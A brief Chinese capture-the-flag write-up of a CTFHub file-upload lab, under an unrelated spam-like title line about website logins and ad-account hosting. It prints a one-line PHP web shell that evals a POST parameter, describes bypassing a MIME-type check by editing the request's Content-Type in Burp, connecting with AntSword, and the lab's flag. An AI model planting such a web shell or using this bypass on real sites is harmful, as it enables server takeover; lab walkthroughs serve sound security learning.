網(wǎng)站的后臺(tái)登錄注冊怎么做賬戶競價(jià)托管公司
開啟靶場,打開鏈接:
直接指明是MIME驗(yàn)證
新建04MIME.php文件,內(nèi)容如下:
<?php echo "Ciallo~(∠?ω< )⌒★";@eval($_POST['pass']);?>
(這里加了點(diǎn)表情,加帶點(diǎn)私貨)
用burp抓包:
將application/octet-stream改成image/png或者jpg和gif符合條件就行:
之后再點(diǎn)擊“forward”提交修改后的報(bào)文
木馬文件上傳成功
訪問一下該文件,觸發(fā)一下:
蟻劍連接:
成功得到flag:
ctfhub{8039866f66db23fc86ef1e42}